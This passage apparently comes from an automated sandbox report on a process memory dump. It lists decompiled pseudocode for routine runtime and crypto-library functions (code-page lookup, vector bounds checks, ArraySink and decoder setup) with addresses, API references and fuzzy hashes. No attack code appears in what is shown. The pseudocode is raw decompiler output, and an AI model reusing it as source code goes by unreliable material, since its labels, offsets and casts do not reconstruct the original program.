                    • Opcode Fuzzy Hash: 6173724c61c2c93aca8c4b32a1e1355046412f9c993f9df8d12eb5ca46510608
                    • Instruction Fuzzy Hash: 9231927190034AAFCB11DBA9CC54FEFB7B8EF59618F14459EE405A7241DB74AA04CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E013E8650(intOrPtr* __ecx, void* __edx) {
                    				void* __ebx;
                    				void* __edi;
                    				signed int _t19;
                    				signed int _t20;
                    				intOrPtr* _t26;
                    				void* _t27;
                    				signed int _t28;
                    				void* _t29;
                    				intOrPtr* _t31;
                    				intOrPtr* _t33;
                    				intOrPtr* _t37;
                    				signed int _t38;
                    				void* _t41;
                    				intOrPtr _t42;
                    				void* _t43;
                    				intOrPtr _t45;
                    				intOrPtr* _t47;
                    				void* _t48;
                    
                    				_t41 = __edx;
                    				_t31 = __ecx;
                    				_t52 =  *((char*)(__ecx + 0x11));
                    				if( *((char*)(__ecx + 0x11)) == 0) {
                    					L7:
                    					if( *((char*)(_t31 + 0x10)) != 0 || E013FF910( *((intOrPtr*)(_t31 + 4)), "ThisObject:", 0xb) != 0) {
                    						L18:
                    						return _t31;
                    					} else {
                    						_t19 = E013F4DFB(_t43, 0x1437448, 0x1439f60);
                    						_t45 =  *((intOrPtr*)(_t31 + 4));
                    						_t33 = _t45 + 0xb;
                    						while(1) {
                    							_t42 =  *_t33;
                    							if(_t42 !=  *_t19) {
                    								break;
                    							}
                    							if(_t42 == 0) {
                    								L14:
                    								_t20 = 0;
                    								L16:
                    								_t60 = _t20;
                    								if(_t20 == 0) {
                    									_push( *((intOrPtr*)(_t31 + 8)));
                    									_push(0x1437444);
                    									_push(_t45);
                    									E013C56E5(_t31, _t42, _t60);
                    									E013D2BA0( *((intOrPtr*)(_t31 + 0xc)) + 0xc,  *_t31 + 0xc);
                    									E013D2BA0( *((intOrPtr*)(_t31 + 0xc)) + 0x24,  *_t31 + 0x24);
                    									 *((char*)(_t31 + 0x10)) = 1;
                    								}
                    								goto L18;
                    							}
                    							_t42 =  *((intOrPtr*)(_t33 + 1));
                    							if(_t42 !=  *((intOrPtr*)(_t19 + 1))) {
                    								break;
                    							}
                    							_t33 = _t33 + 2;
                    							_t19 = _t19 + 2;
                    							if(_t42 != 0) {
                    								continue;
                    							}
                    							goto L14;
                    						}
                    						asm("sbb eax, eax");
                    						_t20 = _t19 | 0x00000001;
                    						__eflags = _t20;
                    						goto L16;
                    					}
                    				}
                    				_t26 = E013F4DFB(_t43, 0x1437448, 0x1439f60);
                    				_t48 = _t48 + 8;
                    				_t47 = _t26;
                    				_push(0xb);
                    				_t27 = E013C6330(_t31,  *((intOrPtr*)(_t31 + 0xc)), _t52, "ThisObject:");
                    				_t53 =  *_t47;
                    				_t43 = _t27;
                    				if( *_t47 != 0) {
                    					_t37 = _t47;
                    					_t3 = _t37 + 1; // 0x1
                    					_t41 = _t3;
                    					do {
                    						_t28 =  *_t37;
                    						_t37 = _t37 + 1;
                    						__eflags = _t28;
                    					} while (_t28 != 0);
                    					_t38 = _t37 - _t41;
                    					__eflags = _t38;
                    					L6:
                    					_push(_t38);
                    					_t29 = E013C6330(_t31, _t43, _t53, _t47);
                    					_push(0x3b);
                    					E013C6296(_t31, _t29, _t41, _t43, 1);
                    					goto L7;
                    				}
                    				_t38 = 0;
                    				goto L6;
                    			}





















                    0x013e8650
                    0x013e8651
                    0x013e8655
                    0x013e8659
                    0x013e86ad
                    0x013e86b1
                    0x013e8742
                    0x013e8745
                    0x013e86cd
                    0x013e86d7
                    0x013e86dc
                    0x013e86e2
                    0x013e86e5
                    0x013e86e5
                    0x013e86e9
                    0x00000000
                    0x00000000
                    0x013e86ed
                    0x013e8701
                    0x013e8701
                    0x013e870a
                    0x013e870a
                    0x013e870c
                    0x013e870e
                    0x013e8711
                    0x013e8716
                    0x013e8717
                    0x013e872b
                    0x013e8737
                    0x013e873c
                    0x013e873c
                    0x00000000
                    0x013e870c
                    0x013e86ef
                    0x013e86f5
                    0x00000000
                    0x00000000
                    0x013e86f7
                    0x013e86fa
                    0x013e86ff
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013e86ff
                    0x013e8705
                    0x013e8707
                    0x013e8707
                    0x00000000
                    0x013e8707
                    0x013e86b1
                    0x013e8665
                    0x013e866d
                    0x013e8670
                    0x013e8672
                    0x013e8679
                    0x013e867e
                    0x013e8681
                    0x013e8683
                    0x013e8689
                    0x013e868b
                    0x013e868b
                    0x013e8690
                    0x013e8690
                    0x013e8692
                    0x013e8693
                    0x013e8693
                    0x013e8697
                    0x013e8697
                    0x013e8699
                    0x013e8699
                    0x013e869d
                    0x013e86a2
                    0x013e86a8
                    0x00000000
                    0x013e86a8
                    0x013e8685
                    0x00000000

                    APIs
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E8665
                      • Part of subcall function 013F4DFB: ___unDName.LIBVCRUNTIME ref: 013F4E2E
                      • Part of subcall function 013F4DFB: InterlockedPushEntrySList.KERNEL32(?,?,?,?,01439F60,?,?,?,?,00000000,?), ref: 013F4EA2
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EAF
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EB7
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013E86D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ___std_type_info_name_free$EntryInterlockedListNamePush___un
                    • String ID: ThisObject:
                    • API String ID: 2562688937-1543776615
                    • Opcode ID: 9044a3bd590dbfe731712603bc63f00b15b7d08ea1335a45fa88dedf30da86ea
                    • Instruction ID: f61c2c3922198f976a495dc137bb177cc36d7b6ec5e4513418e75531f1bc4341
                    • Opcode Fuzzy Hash: 9044a3bd590dbfe731712603bc63f00b15b7d08ea1335a45fa88dedf30da86ea
                    • Instruction Fuzzy Hash: 87218B71A403116BDB165E3CDCAABB33B895F9121CF1844ECD9859B2C3E7A2E919C360
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0140F312(void* __ecx, signed int _a4, intOrPtr _a8) {
                    				int _v8;
                    				int _t15;
                    				int _t16;
                    				signed int _t17;
                    				signed int _t23;
                    				signed int _t25;
                    				signed int _t26;
                    				signed int _t27;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr* _t36;
                    				intOrPtr* _t37;
                    
                    				_push(__ecx);
                    				_t23 = _a4;
                    				if(_t23 == 0) {
                    					L21:
                    					_t15 = E01406FCE(_t23, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                    					__eflags = _t15;
                    					if(_t15 != 0) {
                    						_t16 = _v8;
                    						__eflags = _t16;
                    						if(_t16 == 0) {
                    							_t16 = GetACP();
                    						}
                    						L25:
                    						return _t16;
                    					}
                    					L22:
                    					_t16 = 0;
                    					goto L25;
                    				}
                    				_t17 = 0;
                    				if( *_t23 == 0) {
                    					goto L21;
                    				}
                    				_t36 = 0x14297a0;
                    				_t25 = _t23;
                    				while(1) {
                    					_t30 =  *_t25;
                    					if(_t30 !=  *_t36) {
                    						break;
                    					}
                    					if(_t30 == 0) {
                    						L7:
                    						_t26 = _t17;
                    						L9:
                    						if(_t26 == 0) {
                    							goto L21;
                    						}
                    						_t37 = 0x14297a8;
                    						_t27 = _t23;
                    						while(1) {
                    							_t31 =  *_t27;
                    							if(_t31 !=  *_t37) {
                    								break;
                    							}
                    							if(_t31 == 0) {
                    								L17:
                    								_t49 = _t17;
                    								if(_t17 != 0) {
                    									_t16 = E0140663B(_t23, _t23);
                    									goto L25;
                    								}
                    								if(E01406FCE(_t23, _t49, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                    									goto L22;
                    								}
                    								_t16 = _v8;
                    								goto L25;
                    							}
                    							_t32 =  *((intOrPtr*)(_t27 + 2));
                    							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                    								break;
                    							}
                    							_t27 = _t27 + 4;
                    							_t37 = _t37 + 4;
                    							if(_t32 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    						asm("sbb eax, eax");
                    						_t17 = _t17 | 0x00000001;
                    						__eflags = _t17;
                    						goto L17;
                    					}
                    					_t33 =  *((intOrPtr*)(_t25 + 2));
                    					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                    						break;
                    					}
                    					_t25 = _t25 + 4;
                    					_t36 = _t36 + 4;
                    					if(_t33 != 0) {
                    						continue;
                    					}
                    					goto L7;
                    				}
                    				asm("sbb edx, edx");
                    				_t26 = _t25 | 0x00000001;
                    				__eflags = _t26;
                    				goto L9;
                    			}

















                    0x0140f317
                    0x0140f318
                    0x0140f31f
                    0x0140f3c5
                    0x0140f3d9
                    0x0140f3de
                    0x0140f3e0
                    0x0140f3e6
                    0x0140f3e9
                    0x0140f3eb
                    0x0140f3ed
                    0x0140f3ed
                    0x0140f3f3
                    0x0140f3f8
                    0x0140f3f8
                    0x0140f3e2
                    0x0140f3e2
                    0x00000000
                    0x0140f3e2
                    0x0140f325
                    0x0140f32a
                    0x00000000
                    0x00000000
                    0x0140f330
                    0x0140f335
                    0x0140f337
                    0x0140f337
                    0x0140f33d
                    0x00000000
                    0x00000000
                    0x0140f342
                    0x0140f359
                    0x0140f359
                    0x0140f362
                    0x0140f364
                    0x00000000
                    0x00000000
                    0x0140f366
                    0x0140f36b
                    0x0140f36d
                    0x0140f36d
                    0x0140f373
                    0x00000000
                    0x00000000
                    0x0140f378
                    0x0140f396
                    0x0140f396
                    0x0140f398
                    0x0140f3bd
                    0x00000000
                    0x0140f3c2
                    0x0140f3b5
                    0x00000000
                    0x00000000
                    0x0140f3b7
                    0x00000000
                    0x0140f3b7
                    0x0140f37a
                    0x0140f382
                    0x00000000
                    0x00000000
                    0x0140f384
                    0x0140f387
                    0x0140f38d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140f38f
                    0x0140f391
                    0x0140f393
                    0x0140f393
                    0x00000000
                    0x0140f393
                    0x0140f344
                    0x0140f34c
                    0x00000000
                    0x00000000
                    0x0140f34e
                    0x0140f351
                    0x0140f357
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140f357
                    0x0140f35d
                    0x0140f35f
                    0x0140f35f
                    0x00000000

                    APIs
                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0140F56D,00000000,00000050,?,?,?,?,?), ref: 0140F3ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ACP$OCP
                    • API String ID: 0-711371036
                    • Opcode ID: ea262c73f9b143e0cd834b04ca4008e8dd5ae9133f6b635a33f68356ac2e8adb
                    • Instruction ID: 6e9d8e7e575f347ca3cca5c2a5cea21addbb64e3f99d5218ce9b430e76b04e5b
                    • Opcode Fuzzy Hash: ea262c73f9b143e0cd834b04ca4008e8dd5ae9133f6b635a33f68356ac2e8adb
                    • Instruction Fuzzy Hash: 73210662A04101A7E7339E6BC901B9B7396EF94A34F564437E909D73A0F732E909C390
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 21%
                    			E013EAF34(void* __ebx, void* __edx, void* __eflags, signed int _a4) {
                    				intOrPtr _v8;
                    				char _v16;
                    				intOrPtr* _v20;
                    				intOrPtr* _v24;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t20;
                    				intOrPtr _t24;
                    				signed int _t32;
                    				intOrPtr* _t33;
                    				void* _t36;
                    				signed int _t38;
                    				intOrPtr* _t41;
                    				void* _t43;
                    				signed int _t46;
                    
                    				_t36 = __edx;
                    				_t29 = __ebx;
                    				_t33 = _v20;
                    				E013EC2E0(__ebx, _t43);
                    				E013F4EC6(0, 0);
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				asm("int3");
                    				_push(_t43);
                    				_push(0xffffffff);
                    				_push(E01417F50);
                    				_push( *[fs:0x0]);
                    				_push(__ebx);
                    				_t20 =  *0x1435234; // 0x78d9f939
                    				_push(_t20 ^ _t46);
                    				 *[fs:0x0] =  &_v16;
                    				_v20 = _t46 - 8;
                    				_t41 = _t33;
                    				_v24 = _t41;
                    				_t38 = _a4;
                    				 *_t41 = 0;
                    				 *((intOrPtr*)(_t41 + 4)) = 0;
                    				 *((intOrPtr*)(_t41 + 8)) = 0;
                    				if(_t38 != 0) {
                    					_t52 = _t38 - 0xaaaaaaa;
                    					if(_t38 > 0xaaaaaaa) {
                    						_push("vector<T> too long");
                    						E013F0F81(_t36, _t38, _t41, _t52);
                    					}
                    					_push(_t38);
                    					_t24 = E013EC480(_t29, _t36);
                    					_push(_a4);
                    					 *_t41 = _t24;
                    					 *((intOrPtr*)(_t41 + 4)) = _t24;
                    					_t32 = _t38 + _t38 * 2 << 3;
                    					_push(_t41);
                    					_v8 = 0;
                    					 *((intOrPtr*)(_t41 + 8)) =  *_t41 + _t32;
                    					E013EAC80( *_t41, _t38);
                    					 *((intOrPtr*)(_t41 + 4)) =  *((intOrPtr*)(_t41 + 4)) + _t32;
                    				}
                    				 *[fs:0x0] = _v16;
                    				return _t41;
                    			}


















                    0x013eaf34
                    0x013eaf34
                    0x013eaf34
                    0x013eaf37
                    0x013eaf40
                    0x013eaf45
                    0x013eaf46
                    0x013eaf47
                    0x013eaf48
                    0x013eaf49
                    0x013eaf4a
                    0x013eaf4b
                    0x013eaf4c
                    0x013eaf4d
                    0x013eaf4e
                    0x013eaf4f
                    0x013eaf50
                    0x013eaf53
                    0x013eaf55
                    0x013eaf60
                    0x013eaf64
                    0x013eaf67
                    0x013eaf6e
                    0x013eaf72
                    0x013eaf78
                    0x013eaf7b
                    0x013eaf7d
                    0x013eaf80
                    0x013eaf83
                    0x013eaf89
                    0x013eaf90
                    0x013eaf99
                    0x013eaf9b
                    0x013eafa1
                    0x013eafa3
                    0x013eafa8
                    0x013eafa8
                    0x013eafad
                    0x013eafae
                    0x013eafb3
                    0x013eafb6
                    0x013eafbb
                    0x013eafc0
                    0x013eafc3
                    0x013eafc6
                    0x013eafcd
                    0x013eafd3
                    0x013eafdb
                    0x013eafdb
                    0x013eafe3
                    0x013eaff1

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EAF40
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    • std::_Xinvalid_argument.LIBCPMT ref: 013EAFA8
                      • Part of subcall function 013F0F81: std::invalid_argument::invalid_argument.LIBCONCRT ref: 013F0F8D
                      • Part of subcall function 013F0F81: __CxxThrowException@8.LIBVCRUNTIME ref: 013F0F9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                    • String ID: vector<T> too long
                    • API String ID: 3797282997-3788999226
                    • Opcode ID: b6cf86b1045ac31da6b0aeb5289fbb0a06058ec6ba63c52737732560d8b49103
                    • Instruction ID: a6b98d1da079f752e0245ab739951d12143e0a998ce63b6c19e64ef210f8bc9a
                    • Opcode Fuzzy Hash: b6cf86b1045ac31da6b0aeb5289fbb0a06058ec6ba63c52737732560d8b49103
                    • Instruction Fuzzy Hash: 4211D072900305ABD720DF1DCC41B9BFBF4FB14B14F10462EE85893680D7716904CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E013CF0A0(void* __ecx, intOrPtr* _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				intOrPtr _v64;
                    				char _v68;
                    				char _v84;
                    				char _v88;
                    				char _v92;
                    				void* __ebp;
                    				signed int _t31;
                    				signed int _t32;
                    				char _t36;
                    				void* _t54;
                    				void* _t55;
                    				signed int _t57;
                    
                    				_t31 =  *0x1435234; // 0x78d9f939
                    				_t32 = _t31 ^ _t57;
                    				_v20 = _t32;
                    				 *[fs:0x0] =  &_v16;
                    				_t55 = __ecx;
                    				_v92 = 0;
                    				_v88 = 0;
                    				_t36 =  *((intOrPtr*)( *((intOrPtr*)( *_a4 + 4))))("OutputBuffer", 0x1437f18,  &_v92, _t32, _t54,  *[fs:0x0], E01416A70, 0xffffffff);
                    				_t60 = _t36;
                    				if(_t36 == 0) {
                    					_v64 = 0xf;
                    					_v68 = 0;
                    					_v84 = _t36;
                    					E013C64B7( &_v84, _t60, "ArraySink: missing OutputBuffer argument", 0x28);
                    					asm("xorps xmm0, xmm0");
                    					_v8 = 0;
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8 = 1;
                    					_v60 = 0x141a7b8;
                    					_v48 = 1;
                    					_v24 = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44,  &_v92,  &_v84, 0, 0xffffffff);
                    					_v8 = 0;
                    					_v60 = 0x141a97c;
                    					E013F4EC6( &_v60, 0x1430adc);
                    				}
                    				 *((intOrPtr*)(_t55 + 0xc)) = _v92;
                    				 *((intOrPtr*)(_t55 + 0x10)) = _v88;
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_v88, _v20 ^ _t57);
                    			}























                    0x013cf0b4
                    0x013cf0b9
                    0x013cf0bb
                    0x013cf0c3
                    0x013cf0c9
                    0x013cf0de
                    0x013cf0e5
                    0x013cf0ef
                    0x013cf0f1
                    0x013cf0f3
                    0x013cf0ff
                    0x013cf106
                    0x013cf10d
                    0x013cf110
                    0x013cf115
                    0x013cf118
                    0x013cf11f
                    0x013cf12b
                    0x013cf133
                    0x013cf13a
                    0x013cf141
                    0x013cf148
                    0x013cf14f
                    0x013cf153
                    0x013cf160
                    0x013cf165
                    0x013cf16c
                    0x013cf16c
                    0x013cf174
                    0x013cf17a
                    0x013cf180
                    0x013cf196

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CF16C
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • ArraySink: missing OutputBuffer argument, xrefs: 013CF0F7
                    • OutputBuffer, xrefs: 013CF0D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8RaiseThrow
                    • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                    • API String ID: 3976011213-3781944848
                    • Opcode ID: 70b727a2f2d2cd855c00f70b76f317621f44b7af0e71388add5f877eeddc7420
                    • Instruction ID: 3ab6936f4e52f86c09a33df1cfaada385ea897dbe5bb20f6a85fd8e83dec3f6f
                    • Opcode Fuzzy Hash: 70b727a2f2d2cd855c00f70b76f317621f44b7af0e71388add5f877eeddc7420
                    • Instruction Fuzzy Hash: 4D3159B0944349AFDB00CFD8D884BDEBBF4EB19714F20421EE411BB394D7B55A488B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E013D1D50(void* __ebx, intOrPtr* __ecx, void* __edi, void* __ebp, char _a4) {
                    				intOrPtr _v12;
                    				intOrPtr* _v20;
                    				void* __esi;
                    				intOrPtr _t20;
                    				intOrPtr* _t27;
                    				intOrPtr* _t29;
                    				void* _t31;
                    				void* _t34;
                    				signed int _t39;
                    				intOrPtr* _t41;
                    				intOrPtr _t43;
                    				intOrPtr* _t45;
                    
                    				_t29 = __ecx;
                    				_push(__ebx);
                    				_t27 = __ecx;
                    				_push(__ebp);
                    				_t45 = _a4;
                    				 *__ecx = 0;
                    				 *((intOrPtr*)(__ecx + 4)) = 0;
                    				 *((intOrPtr*)(__ecx + 8)) = 0;
                    				_t4 =  &_a4; // 0x142e86c
                    				_t39 =  *_t4 -  *_t45 >> 2;
                    				 *__ecx = 0;
                    				 *((intOrPtr*)(__ecx + 4)) = 0;
                    				 *((intOrPtr*)(__ecx + 8)) = 0;
                    				if(_t39 == 0) {
                    					L3:
                    					return _t27;
                    				} else {
                    					if(_t39 > 0x3fffffff) {
                    						_push("vector<T> too long");
                    						E013F0F81(_t31, __edi, _t39, __eflags);
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						asm("int3");
                    						_push(_t29);
                    						_push(_t39);
                    						_t41 = _t29;
                    						_v20 = _t41;
                    						E013C3153(_t29, _v12);
                    						 *_t41 = 0x141ccc8;
                    						return _t41;
                    					} else {
                    						_t20 = E013E2C10(__ecx, _t31, _t45, _t39, __edi);
                    						 *_t27 = _t20;
                    						 *((intOrPtr*)(_t27 + 4)) = _t20;
                    						 *((intOrPtr*)(_t27 + 8)) =  *_t27 + _t39 * 4;
                    						_t11 =  &_a4; // 0x142e86c
                    						_t34 =  *_t11 -  *_t45;
                    						_t43 =  *_t27;
                    						E013F47C0(_t43,  *_t45, _t34);
                    						 *((intOrPtr*)(_t27 + 4)) = _t34 + _t43;
                    						goto L3;
                    					}
                    				}
                    			}















                    0x013d1d50
                    0x013d1d50
                    0x013d1d51
                    0x013d1d53
                    0x013d1d54
                    0x013d1d59
                    0x013d1d5f
                    0x013d1d66
                    0x013d1d6d
                    0x013d1d73
                    0x013d1d76
                    0x013d1d7c
                    0x013d1d83
                    0x013d1d8c
                    0x013d1dc6
                    0x013d1dcb
                    0x013d1d8e
                    0x013d1d94
                    0x013d1dce
                    0x013d1dd3
                    0x013d1dd8
                    0x013d1dd9
                    0x013d1dda
                    0x013d1ddb
                    0x013d1ddc
                    0x013d1ddd
                    0x013d1dde
                    0x013d1ddf
                    0x013d1de0
                    0x013d1de1
                    0x013d1de6
                    0x013d1de8
                    0x013d1dec
                    0x013d1df1
                    0x013d1dfb
                    0x013d1d96
                    0x013d1d98
                    0x013d1d9d
                    0x013d1d9f
                    0x013d1da7
                    0x013d1daa
                    0x013d1db0
                    0x013d1db2
                    0x013d1db7
                    0x013d1dc2
                    0x00000000
                    0x013d1dc5
                    0x013d1d94

                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 013D1DD3
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 013D1DEC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
                    • String ID: vector<T> too long
                    • API String ID: 1997705970-3788999226
                    • Opcode ID: 25cc2e984894404302fe5c49c094fc7ed3b36f3a8c7c8fcdde6b1a8d224a822c
                    • Instruction ID: 37267dc4f41fea2c15addbd2950c186812ef7f6f10aebbd20f236bf1c993f3cc
                    • Opcode Fuzzy Hash: 25cc2e984894404302fe5c49c094fc7ed3b36f3a8c7c8fcdde6b1a8d224a822c
                    • Instruction Fuzzy Hash: 1F113DB25012249FDB10DF5CD884B4ABBE8EF55714F14C56AE9089F349D771E904CBE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E013C2C47(intOrPtr* __ecx) {
                    				intOrPtr* _t41;
                    				intOrPtr* _t46;
                    				void* _t48;
                    
                    				_t41 = __ecx;
                    				_push(0x1c);
                    				E013F26F6(E0141567D);
                    				_t46 = _t41;
                    				 *((intOrPtr*)(_t48 - 0x18)) = _t46;
                    				_push(0);
                    				 *((intOrPtr*)(_t48 - 0x1c)) = _t46;
                    				 *((intOrPtr*)(_t48 - 0x14)) =  *((intOrPtr*)(_t48 + 8));
                    				E013CE1A0();
                    				 *_t46 = 0x141b4cc;
                    				 *((intOrPtr*)(_t46 + 4)) = 0x141b590;
                    				 *((intOrPtr*)(_t46 + 0x18)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x1c)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x20)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x24)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x28)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x2c)) = 0;
                    				 *(_t46 + 0x34) =  *(_t46 + 0x34) | 0xffffffff;
                    				 *((intOrPtr*)(_t48 - 4)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x38)) = 0;
                    				 *((intOrPtr*)(_t46 + 0x3c)) = 0;
                    				 *((char*)(_t48 - 4)) = 2;
                    				E013CEA70(_t46,  *((intOrPtr*)(_t48 + 0x10)));
                    				_push(1);
                    				_push(_t48 - 0x14);
                    				_push("DecodingLookupArray");
                    				_push(_t48 - 0x28);
                    				_push( *(E013C20AD() + 8) & 0x000000ff);
                    				 *((char*)(_t48 - 4)) = 3;
                    				_push(_t48 + 0xc);
                    				_push("Log2Base");
                    				E013E8FB0(0, _t46,  *(_t46 + 0x34), E013C1E98(_t32,  *(_t46 + 0x34)));
                    				E013C3BEC(_t48 - 0x24);
                    				return E013F26B1(_t46);
                    			}






                    0x013c2c47
                    0x013c2c47
                    0x013c2c4e
                    0x013c2c53
                    0x013c2c55
                    0x013c2c60
                    0x013c2c61
                    0x013c2c64
                    0x013c2c67
                    0x013c2c6c
                    0x013c2c72
                    0x013c2c79
                    0x013c2c7c
                    0x013c2c7f
                    0x013c2c82
                    0x013c2c85
                    0x013c2c88
                    0x013c2c8b
                    0x013c2c8f
                    0x013c2c92
                    0x013c2c95
                    0x013c2c9b
                    0x013c2c9f
                    0x013c2ca4
                    0x013c2ca9
                    0x013c2cad
                    0x013c2cb2
                    0x013c2cc1
                    0x013c2cc5
                    0x013c2cc9
                    0x013c2cca
                    0x013c2cd7
                    0x013c2cdf
                    0x013c2ceb

                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C2C4E
                      • Part of subcall function 013C20AD: __EH_prolog3.LIBCMT ref: 013C20B4
                      • Part of subcall function 013C1E98: __EH_prolog3.LIBCMT ref: 013C1E9F
                      • Part of subcall function 013C1E98: new.LIBCMT ref: 013C1EAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
